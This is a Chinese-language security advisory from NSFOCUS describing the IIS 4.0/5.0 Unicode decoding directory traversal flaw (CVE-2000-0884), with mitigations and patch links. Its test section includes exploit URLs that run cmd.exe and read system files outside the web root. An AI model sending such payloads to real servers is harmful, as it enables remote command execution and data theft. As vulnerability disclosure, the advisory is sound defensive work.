首頁 -> 安全研究

安全研究

安全公告
綠盟科技安全公告(SA2000-06)

NSFOCUS安全小組([email protected])
http://www.nsfocus.com

Microsoft IIS Unicode解碼目錄遍歷漏洞

發布日期:2000-10-20

CVE ID:CVE-2000-0884

受影響的軟件及系統:
====================
- Microsoft IIS 4.0
- Microsoft IIS 5.0

綜述:
======
NSFOCUS安全小組發現微軟IIS 4.0和IIS 5.0在Unicode字符解碼的實現中存在一個安全漏洞,導致用戶可以遠程通過IIS執行任意命令。當IIS打開文件時,如果該文件名包含unicode字符,它會對其進行解碼,如果用戶提供一些特殊的編碼,將導致IIS錯誤的打開或者執行某些web根目錄以外的文件。

分析:
======
對于IIS 5.0/4.0中文版,當IIS收到的URL請求的文件名中包含一個特殊的編碼例如"%c1%hh"或者"%c0%hh",它會首先將其解碼變成:0xc10xhh, 然后嘗試打開這個文件,Windows 系統認為0xc10xhh可能是unicode編碼,因此它會首先將其解碼,如果 0x00<= %hh < 0x40的話,采用的解碼的格式與下面的格式類似:

%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh


例如,在Windows 2000 簡體中文版 + IIS 5.0 + SP1系統下測試:

http://target/A.ida/%c1%00.ida

IIS會報告說 "@.ida" 文件找不到
這里: (0xc1-0xc0)*0x40+0x00=0x40='@'

http://target/A.ida/%c1%01.ida
IIS會報告說 "A.ida" 文件找不到
這里: (0xc1-0xc0)*0x40+0x01=0x41='A'

http://target/A.ida/%c1%02.ida
IIS會報告說 "B.ida" 文件找不到
這里: (0xc1-0xc0)*0x40+0x02=0x42='B'
.....

http://target/A.ida/%c0%21.ida
IIS會報告說 "!.ida" 文件找不到
這里: (0xc0-0xc0)*0x40+0x21=0x21='!'
....

因此,利用這種編碼,我們可以構造很多字符,例如:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

攻擊者可以利用這個漏洞來繞過IIS的路徑檢查,去執行或者打開任意的文件。

Rain Forest Puppy 測試發現對于英文版的IIS 4.0/5.0,此問題同樣存在,只是編碼格式略有不同,變成"%c0%af"或者"%c1%9c".

測試方法:
==========
(1) 如果系統包含某個可執行目錄,就可能執行任意系統命令。下面的URL可能列出當前目錄的內容:

http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

(2) 利用這個漏洞查看系統文件內容也是可能的:

http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

解決方法:
==========
1、如果不需要可執行的CGI,可以刪除可執行虛擬目錄,例如 /scripts等等。
2、如果確實需要可執行的虛擬目錄,建議可執行虛擬目錄單獨在一個分區。

廠商狀態:
==========
微軟已就此發布了一個安全公告(MS00-078) 以及相應補丁。

您可以在下列地址看到微軟安全公告的詳細內容:

http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

補丁程序可以在下列地址下載:

. Microsoft IIS 4.0:

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

. Microsoft IIS 5.0:

http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

注意:這個補丁程序與MS00-57中所提供的補丁是同一個程序,如果您已經安裝了MS00-57中的補丁,您可以不用再重新安裝此補丁程序。

聲 明
==========

本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部內容。未經綠盟科技允許,不得任意修改或者增減此安全公告內容,不得以任何方式將其用于商業目的。

關于綠盟科技
============

綠盟科技(NSFOCUS Co., Ltd.)是中國網絡安全領域的領導企業,致力于網絡和系統安全問題的研究、高端網絡安全產品的研發、銷售與網絡安全服務,在入侵檢測/保護、遠程評估、 DDoS攻擊防護等方面提供具有國際競爭能力的先進產品,是國內最具安全服務經驗的專業公司。有關綠盟科技的詳情請參見: http://www.nsfocus.com

© 2020 綠盟科技
浙江快乐彩网上投注